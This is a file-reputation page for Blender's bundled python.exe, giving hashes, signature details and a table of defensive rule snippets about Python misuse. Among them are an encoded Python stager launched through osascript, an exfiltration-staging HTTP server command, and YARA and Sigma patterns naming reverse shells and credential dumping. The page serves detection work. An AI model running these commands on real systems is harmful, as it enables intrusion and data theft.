python.exe

  • File Path: C:\Program Files\Blender Foundation\Blender 2.83\2.83\python\lib\venv\scripts\nt\python.exe
  • Description: Python

Hashes

Type Hash
MD5 1E9F2876D3A27B53A7B68FD88683A9A1
SHA1 0EAA58F0C6F91C5E13B4EA1BC963AFBC27ED2632
SHA256 E21BA13B212DD3638383A5C7DD1AC3E1F139C670C3FEF2256442E965F25235C7
SHA384 3BDCDB057C894DB90845487A70F68E3299342BAE0669D4176C21E5A2CAC4A30C8599B806839BF24B6C8F82EFFF10E183
SHA512 CAC91679725E27ED19CADC90C90977A76D5396D1B4EF3295A6ED002DACAFAC7C5FCCDDE40B01A682EF6A397FA9E0F9428398BFE40C6607C9006C467FD1E80362
SSDEEP 6144:x4DoL2F+GFJyYR5/UHEAVgnRLOrS70rGCHwKIkHcWi3Brx1YlWM:yM2jFcYjQ/VILOGYzQN4cWiBxA

Runtime Data

Usage (stderr):

No pyvenv.cfg file

Signature

  • Status: Signature verified.
  • Serial: 0FC2CFDD6D5AD878EA6A7AFB6D7A5CD2
  • Thumbprint: 18A976606F95649BB479D1934F21F2AC37D642A8
  • Issuer: CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
  • Subject: CN=Stichting Blender Foundation, O=Stichting Blender Foundation, L=Amsterdam, S=Noord-Holland, C=NL

File Metadata

  • Original Filename: py.exe
  • Product Name: Python
  • Company Name: Python Software Foundation
  • File Version: 3.7.4
  • Product Version: 3.7.4
  • Language: Language Neutral
  • Legal Copyright: Copyright 2001-2016 Python Software Foundation. Copyright 2000 BeOpen.com. Copyright 1995-2001 CNRI. Copyright 1991-1995 SMC.

File Similarity (ssdeep match)

File Score
C:\program files\Blender Foundation\Blender 2.83\2.83\python\lib\venv\scripts\nt\python.exe 97
C:\Program Files\Blender Foundation\Blender 2.90\2.90\python\lib\venv\scripts\nt\python.exe 96

Possible Misuse

The following table contains possible examples of python.exe being misused. While python.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sigma-test.yml # This workflow will install Python dependencies, run tests and lint with a single version of Python DRL 1.0
sigma sigma-test.yml # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions DRL 1.0
sigma sigma-test.yml - name: Set up Python 3.8 DRL 1.0
sigma sigma-test.yml uses: actions/setup-python@v1 DRL 1.0
sigma sigma-test.yml python-version: 3.8 DRL 1.0
sigma sigma-test.yml python -m pip install --upgrade pip DRL 1.0
sigma app_python_sql_exceptions.yml title: Python SQL Exceptions DRL 1.0
sigma app_python_sql_exceptions.yml description: Generic rule for SQL exceptions in Python according to PEP 249 DRL 1.0
sigma app_python_sql_exceptions.yml - https://www.python.org/dev/peps/pep-0249/#exceptions DRL 1.0
sigma app_python_sql_exceptions.yml product: python DRL 1.0
sigma lnx_shell_susp_commands.yml - 'python -m SimpleHTTPServer' DRL 1.0
sigma lnx_shell_susp_commands.yml - '-m http.server' # Python 3 DRL 1.0
sigma proc_creation_macos_screencapture.yml - https://github.com/BC-SECURITY/Empire/blob/master/lib/modules/python/collection/osx/screenshot.py DRL 1.0
sigma web_exchange_exploitation_hafnium.yml - 'python-requests/2.19.1' DRL 1.0
sigma web_exchange_exploitation_hafnium.yml - 'python-requests/2.25.1' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\python.exe' DRL 1.0
sigma image_load_susp_python_image_load.yml title: Python Py2Exe Image Load DRL 1.0
sigma image_load_susp_python_image_load.yml description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. DRL 1.0
sigma image_load_susp_python_image_load.yml Description: 'Python Core' DRL 1.0
sigma image_load_susp_python_image_load.yml - 'Python' # FPs with python38.dll, python.exe etc. DRL 1.0
sigma net_connection_win_python.yml title: Python Initiated Connection DRL 1.0
sigma net_connection_win_python.yml - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python DRL 1.0
sigma net_connection_win_python.yml Image\|contains: python DRL 1.0
sigma net_connection_win_python.yml - Legitimate python script DRL 1.0
sigma proc_access_win_pypykatz_cred_dump_lsass_access.yml - 'python3*.dll+' # Pypy requires python>=3.6 DRL 1.0
sigma proc_creation_win_pypykatz.yml - \python.exe DRL 1.0
sigma proc_creation_win_susp_adidnsdump.yml This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, DRL 1.0
sigma proc_creation_win_susp_adidnsdump.yml Image\|endswith: \python.exe DRL 1.0
sigma proc_creation_win_webshell_recon_detection.yml description: Looking for processes spawned by web server components that indicate reconnaissance by popular public domain webshells for whether perl, python or wget are installed. DRL 1.0
sigma proc_creation_win_webshell_recon_detection.yml - 'python --help' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentversion.yml Details\|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' DRL 1.0
sigma arcsight.yml python: DRL 1.0
sigma arcsight.yml product: python DRL 1.0
sigma arcsight.yml deviceProduct: Python DRL 1.0
sigma sumologic-cse.yml application-python: DRL 1.0
sigma sumologic-cse.yml product: python DRL 1.0
sigma sumologic.yml application-python: DRL 1.0
sigma sumologic.yml product: python DRL 1.0
LOLBAS Testxlst.yml Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).  
malware-ioc evilnum Python/Agent.JM © ESET 2014-2018
malware-ioc evilnum Python/TrojanProxy.Agent.B © ESET 2014-2018
malware-ioc evilnum Python/Spy.KeyLogger.HF © ESET 2014-2018
malware-ioc evilnum Python/RiskWare.LaZagne.D © ESET 2014-2018
malware-ioc evilnum Python/Pyvil.A © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.A", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.B", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.C", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.D", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.E", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.F", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python/Machete.G", © ESET 2014-2018
malware-ioc misp-machete-event.json "value": "Python.27.exe", © ESET 2014-2018
malware-ioc machete \|048C40EB606DA3DEF08C9F6997C1948AFBBC959B\|Python/Machete.F © ESET 2014-2018
malware-ioc machete \|2E8D8508096CAA38493414F6BA788D0041EA9E15\|Python/Machete.F © ESET 2014-2018
malware-ioc machete \|85BDD7D871108C737701AC30C14A2D343CBDEF94\|Python/Machete.D © ESET 2014-2018
malware-ioc machete \|8ED8CB784512F7DADD147347FC94E945FAF16338\|Python/Machete.F © ESET 2014-2018
malware-ioc machete \|9C413075AAB7EF7876B8DC8D7B7C1B9B96842C6E\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|AB8DD6B0CC950618589603012863B57F7ADB9D9B\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|318496B58CF5052EFD49A95C721D9165278E9FCE\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|3BB345032B6D0226D6771BA65FE4DA0FAF628631\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|946A24DFBD0AE94209EF7C284D3F462548566A3C\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|984B9202A6DBD7D3DD696CAE1220338A68092DC9\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|EABD45D0A86113F5CCFF9FD292C1E482A5727815\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|F05BC018C90B560DC4932758956ADFFBC10588CE\|Python/Machete.B © ESET 2014-2018
malware-ioc machete \|204A2850548E5994D4696E9002F90DFCCBE2093A\|Python/Machete.C © ESET 2014-2018
malware-ioc machete \|3792588EDC809270E6666A4677EC85A3400BA4CF\|Python/Machete.E © ESET 2014-2018
malware-ioc machete \|4899A2C2CECEB92D2CC4ED17D092D1D599379284\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|A42756280AA352F4612BED85AABF7F3267E676C2\|Python/Machete.E © ESET 2014-2018
malware-ioc machete \|A97CF05AD7F3102BDE45E4B4947ED435EFEA1968\|Python/Machete.E © ESET 2014-2018
malware-ioc machete \|C4ACCF6071F51ADE102190C6FA350435FC202654\|Python.27.exe © ESET 2014-2018
malware-ioc machete \|D5238CDE036EEFCC6D8D686B3A00247F27DA894C\|Python.27.exe © ESET 2014-2018
malware-ioc machete \|2B7404F6B0075BC1192D61D4AF135D521D5F08A3\|RdrCEF.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|53102E57B40FEACB64566C26D101D9242DECE77C\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|56E8743E0773286A4B9E055147D96D53A43BECA1\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|71F69F04307C8F5675DCADEAA80B8C2B95691B01\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|904137B61F1DED66C8CA76EBF198DEC1B638B5D4\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|FBB485B40477F5A014E7096747B1B4A494CE50EF\|Down.exe\|Python/Machete.A © ESET 2014-2018
malware-ioc machete \|1B3723651E1D321D4F34F2A243D7751D17288257\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|7FFB9C7DA20C536B694E78538B65726EACB1B055\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|B1ADF4B46350FB801CE54DA9C93A4EF79674F3F5\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|0C33B75F6C4FC0413ABDBCDA1C5E18C907F13DC3\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|314D9B4C25DD69453D86E4C7062DCE6DEDDA0533\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|D4CF22F3DB78BDC1CEB55431857D88166CE677D4\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|26FB301AF7393B5E564B8C802F5795EDEBD7CECF\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|979859B5A177650EF0549C81FD66D36E9DEA8078\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|A07E38DF9887EA7811369CD72C57FD6D44523CD6\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|07E383E9FF04F587769845306DC4BFE75630BAAA\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|3B6F5CB20FF3AC0EE3813A68A937AAE92EBC46D3\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|56765B7511372A8E9BE017F48A764D141F485474\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|CF2DC40926D8747AEC572DFD711BBFD766AADB10\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|6B42091CA2F89A59F4E27E30ACDACF32EB83F824\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|708F159F2CFE22FF0C4464F2FEDAA0501868BDD8\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|DE639618B550DBE9071E999AAA5B4FC81F63A5A6\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|0B6F61AF3E2C6551F15E0F888177EEC91F20BA99\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|76AABC0AF5D487A80BCBA19555191B46766139FA\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|7FF87649CA1D9178A02CD9942856D1B590652C6E\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|8692EB1E620F2BCDDAF28F0CB726CEC2AA1C230D\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|8AF19AA3F18CB35F12EE3966931E11799C3AC5A4\|Python/Machete.G © ESET 2014-2018
malware-ioc machete \|E1BC4EC7F82FA06924DC4B43FBBB485D8C86D9CD\|Python/Machete.G © ESET 2014-2018
malware-ioc vf_ioc_linux_rakos.py # 2) Run: python vol.py -f dump_from_compromise_linux_system.vmem © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 57dad9cda501bc8f1d0496ef010146d9a1d3734f", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 385f26d29b46ff55c5f4d6bbfd3da12eb5c33ed7", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 16c206d9cfd4c82d6652afb1eebb589a927b041b", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor", © ESET 2014-2018
malware-ioc telebots - Python/TeleBot.AA trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.Q trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.AE trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.AD trojan © ESET 2014-2018
malware-ioc telebots === Python/TeleBot.AA backdoor © ESET 2014-2018
atomic-red-team index.md - Atomic Test #2: Dump individual process memory with Python (Local) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Port Scan using python [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1059.006 Python MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Execute shell script via python’s command mode arguement [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Execute Python via scripts (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Execute Python via Python executables (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Dump individual process memory with Python (Local) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1059.006 Python MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #1: Execute shell script via python’s command mode arguement [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Execute Python via scripts (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Execute Python via Python executables (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1059.006 Python CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Port Scan using python [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1059.006 Python CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Spearphishing via Service CONTRIBUTE A TEST | Python | Create or Modify System Process CONTRIBUTE A TEST | Event Triggered Execution CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | Man-in-the-Middle CONTRIBUTE A TEST | Local Groups | | Data from Network Shared Drive CONTRIBUTE A TEST | Scheduled Transfer CONTRIBUTE A TEST | External Proxy CONTRIBUTE A TEST | Inhibit System Recovery CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | Spearphishing Link CONTRIBUTE A TEST | Python CONTRIBUTE A TEST | Dylib Hijacking CONTRIBUTE A TEST | Event Triggered Execution CONTRIBUTE A TEST | Domain Accounts CONTRIBUTE A TEST | Keychain | Network Sniffing | | Data from Network Shared Drive CONTRIBUTE A TEST | Exfiltration over USB CONTRIBUTE A TEST | Domain Generation Algorithms CONTRIBUTE A TEST | Endpoint Denial of Service CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Python | Compromise Client Software Binary CONTRIBUTE A TEST | DLL Side-Loading | Create Snapshot CONTRIBUTE A TEST | Kerberoasting | Process Discovery | | Local Data Staging | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | Spearphishing Link CONTRIBUTE A TEST | Python CONTRIBUTE A TEST | Browser Extensions | COR_PROFILER | Compile After Delivery | Forced Authentication | Network Sniffing | Shared Webroot CONTRIBUTE A TEST | Data from Removable Media CONTRIBUTE A TEST | Exfiltration to Code Repository CONTRIBUTE A TEST | Encrypted Channel | Firmware Corruption CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Parses secrets hidden in the LSASS process with python. Similar to mimikatz’s sekurlsa:: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Python 3 must be installed, use the get_prereq_command’s to meet the prerequisites for this test. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md - Atomic Test #2 - Dump individual process memory with Python (Local) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md ## Atomic Test #2 - Dump individual process memory with Python (Local) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md Using /proc/$PID/mem, where $PID is the target process ID, use a Python script to MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md PYTHON=$(which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md $PYTHON #{python_script} $PID #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md (which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md echo “Python 2.7+ or 3.4+ must be installed” MIT License. © 2018 Red Canary
atomic-red-team T1018.md Python 3 and adidnsdump must be installed, use the get_prereq_command’s to meet the prerequisites for this test. MIT License. © 2018 Red Canary
atomic-red-team T1018.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1018.md if (python –version) {exit 0} else {exit 1} MIT License. © 2018 Red Canary
atomic-red-team T1018.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1036.006.md 1. echo ‘#!/bin/bash\necho “print "hello, world!"” | /usr/bin/python\nexit’ > execute.txt && chmod +x execute.txt MIT License. © 2018 Red Canary
atomic-red-team T1046.md - Atomic Test #4 - Port Scan using python MIT License. © 2018 Red Canary
atomic-red-team T1046.md ## Atomic Test #4 - Port Scan using python MIT License. © 2018 Red Canary
atomic-red-team T1046.md Scan ports to check for listening ports with python MIT License. © 2018 Red Canary
atomic-red-team T1046.md python #{filename} -i #{host_ip} MIT License. © 2018 Red Canary
atomic-red-team T1046.md ##### Description: Check if python exists on the machine MIT License. © 2018 Red Canary
atomic-red-team T1046.md if (python –version) {exit 0} else {exit 1} MIT License. © 2018 Red Canary
atomic-red-team T1046.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md 2. Using Python to establish a one-line HTTP server on victim system: MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md python -m SimpleHTTPServer 1337 MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.(Citation: Macro Malware Targets Macs)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of “t3VhVOs/DyCcDTFzIKanRxkvk3I=”, unless ‘Little Snitch’ is installed, in which case it will just exit. MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md osascript -e “do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(‘ignore’);exec(base64.b64decode(‘aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==’));\" | python &"” MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md # T1059.006 - Python MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md <blockquote>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #1 - Execute shell script via python’s command mode arguement MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #2 - Execute Python via scripts (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #3 - Execute Python via Python executables (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #1 - Execute shell script via python’s command mode arguement MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Download and execute shell script and write to file then execute locally using Python -c (command mode) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md which_python=$(which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ##### Description: Verify if python is in the environment variable path and attempt to import requests library. MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md which_python=$(which python || which python3 || which python2); $which_python -V MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #2 - Execute Python via scripts (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Create Python file (.py) that downloads and executes shell script via executor arguments MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_script_name | Python script name | Path | T1059.006.py| MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #3 - Execute Python via Python executables (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_script_name | Name of Python script name | Path | T1059.006.py| MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_binary_name | Name of Python file to be compiled | Path | T1059.006.pyc| MIT License. © 2018 Red Canary
atomic-red-team T1140.md - Atomic Test #3 - Base64 decoding with Python MIT License. © 2018 Red Canary
atomic-red-team T1140.md ## Atomic Test #3 - Base64 decoding with Python MIT License. © 2018 Red Canary
atomic-red-team T1140.md Use Python to decode a base64-encoded text string and echo it to the console MIT License. © 2018 Red Canary
atomic-red-team T1140.md ##### Description: Python must be present MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo “Please install Python 3” MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md <blockquote>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data. MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #1 - Compressing data using GZip in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #2 - Compressing data using bz2 in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #3 - Compressing data using zipfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #4 - Compressing data using tarfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #1 - Compressing data using GZip in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses GZip from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md which_python=which python; $which_python -V MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #2 - Compressing data using bz2 in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses bz2 from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #3 - Compressing data using zipfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses zipfile from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #4 - Compressing data using tarfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses tarfile from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1574.006.md On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage Dynamic Linker Hijacking to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ. MIT License. © 2018 Red Canary
signature-base airbnb_binaryalert.yar description = “A tool for injecting arbitrary code into running Python processes.” CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s3 = “A reverse Python connection payload.” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s4 = “pyrasite - inject code into a running python process” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s10 = “Write out a reverse python connection payload with a custom port” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s13 = “A reverse Python shell that behaves like Python interactive interpreter.” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar description = “creddump is a python tool to extract credentials and secrets from Windows registry hives.” CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar description = “Custome SSH backdoor based on python and paramiko - file server.py” CC BY-NC 4.0
signature-base apt_fvey_shadowbroker_jan17.yar $b1 = “Added Ops library to Python search path” fullword ascii CC BY-NC 4.0
signature-base apt_hafnium_log_sigs.yar $xr4 = /POST \/ecp\/[^\n]{100,600} (ExchangeServicesClient\/0.0.0.0|python-requests\/2.19.1|python-requests\/2.25.1)[^\n]{200,600} (200|301|302) / CC BY-NC 4.0
signature-base apt_nk_inkysquid.yar description = “Python Loader used to execute the BLUELIGHT malware family.” CC BY-NC 4.0
signature-base apt_nk_inkysquid.yar $s5 = “python ended” ascii CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Strings from Python version of Agent” CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Piece of Base64 encoded data from Agent Python version” CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Strings from Python keylogger” CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Python getos utility” CC BY-NC 4.0
signature-base apt_sandworm_exim_expl.yar description = “Detects Sandworm Python loader” CC BY-NC 4.0
